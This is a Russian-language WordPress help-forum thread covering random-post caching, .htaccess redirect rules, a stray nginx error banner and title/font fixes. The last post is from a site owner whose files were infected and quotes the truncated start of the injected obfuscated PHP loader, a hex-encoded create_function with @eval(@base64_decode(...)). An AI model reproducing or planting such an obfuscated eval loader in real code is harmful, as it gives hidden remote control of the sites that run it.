Спрашиваем и отвечаем по Wordpress-5

HM
На сайте с 14.01.2012
223

вывожу на странице ссылки на рандомные посты так:

http://codex.wordpress.org/Template_Tags/get_posts#Random_posts

есть ли более быстрое решение, а еще лучше кеширование этой функции?

Lubimov
На сайте с 23.06.2011
66

SeVlad,

На мой вопрос не ответе те?

SeVlad
На сайте с 03.11.2008
1609
Lubimov:
На мой вопрос не ответе те?

Я не телепат.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Nomiki
На сайте с 28.03.2012
117
Lubimov:

RewriteRule ^category/category/post/(.*)$ /post/$1 [R=301,L] редиректит некоторые подразделы, некоторые нет. Как такое может быть?
Кеш прочишен (удалены все плагины кеша)

Так приведите/посмотрите чем отличаются урлы: дефисы, слэшы, окончания, xчем генерились ранее (seo-плагином и чпу например) у редиректных и тех, что не поменялись.

Заказать дизайн сайта: nomiki@yandex.ru | Портфолио: behance.net/nomiki | ВК: vk.com/nmk_msk
Lubimov
На сайте с 23.06.2011
66
Nomiki:
Так приведите/посмотрите чем отличаются урлы: дефисы, слэшы, окончания, xчем генерились ранее (seo-плагином и чпу например) у редиректных и тех, что не поменялись.

Все посмотрел, переустанавливал вордпресс - безрезультатно. Думаю это издержки Yoast WordPress SEO, удалил плагин, не помогло.

К тому же RewriteRule ^category/post/(.*)$ post/$1 [R=301,L] четко редиректит разделы

Nomiki
На сайте с 28.03.2012
117
Lubimov:
К тому же RewriteRule ^category/post/(.*)$ post/$1 [R=301,L] четко редиректит разделы

Посмотрите все варианты (актуально и для WP, но для WP сходу - не нашел)

S
На сайте с 24.01.2009
73

Здравствуйте.

Проблема в следующем:

Для нормальной работы одного из моих онлайн магазинов (не на WP), нужно было включить расширение curl.so. Я его включил, магазин заработал, но на одном из сайтов на Wordpress на этом же сервере, сверху в шапке появилась надпись:

"404 Not Found

nginx/0.7.67"

а ниже этой надписи вполне рабочий сайт, то есть все остальное нормально работает, только эти надписи раздражают. При отключении расширения curl.so надпись исчезает, но перестает работать магазин. На других WP сайтах на этом же сервере никаких проблем не появилось, поэтому думаю проблема в шаблоне, который установлен на проблемном сайте. Я плохо разбираюсь в технических проблемах Wordpress, поэтому решил задать вопрос тут. Пробовал из файла header.php удалять некоторые строчки и проверять, не исчезнет ли надпись. При удалении строки "<?php wp_head(); ?>" исчезает, но появляется куча других косяков дизайна и подключенных плагинов. Пробовал отключать по очереди все плагины, проблема не исчезала. Может знаете в чем может быть проблема?

jesterlg13
На сайте с 14.01.2013
54

Дублируется тайтл на главной и в записях.

Я не знаю где можно это поменять, подскажите будьте добры. :)

Пробывал путем установки плагина "WP Title 2"

В админке все отображается а на странице нет.

http://basin.com.ua/ - первая страница

http://basin.com.ua/stati/ - вторая страница.

И еще попутный вопрос, как изменить шрифт на главной странице, через css не выходит. Может я не там меняю. Текст написан в футере. и в файле css он изменен на Arial

Вот файл.http://www.ex.ua/view_storage/640666231129

MB
На сайте с 11.05.2010
28

#footer {

font-size: 16px;

}

Это по стилям.

По тайтлам смотрим настройки плагина. А лучше поставить allinoneseo и использовать его.

stundr
На сайте с 19.06.2008
201

Появилась проблема, кто то внедрил непонятный мне код во многие файлы движка WP в папку wp-includes. В самом начале файла, в связи с чем или сайт не открывается, выдает ошибку, или админка не открывается. Ну и в некоторых файлах тем так же есть этот код, плюс частично в некоторых файлах отсутсвует часть кода.

Сам код выглядит везде одинаково:

<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3ow...
далее много таких же непонятных символов...

Почистил таким способом: где показывает ошибку, ищу этот файл и там чищу... После того как все сайты заработали, прошелся по ссылкам, где то не работали пункты меню или админки (так же выдавало ошибку, смотрел уже эти файлы и правил). В результате встало все на место, все открывается и работает.

Вопрос, кроме как сменить пароль на хостинг, что еще можно сделать, что бы этого не повторилось? Можно ли как то найти еще этот код без скачивания всего что есть на хостинге (у меня cPanel) к себе на компьютер и поиском в файлах? Ну и может зараза сидела не только в этих файлах, а где то еще сидит, как это можно определить?

=^_^=

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий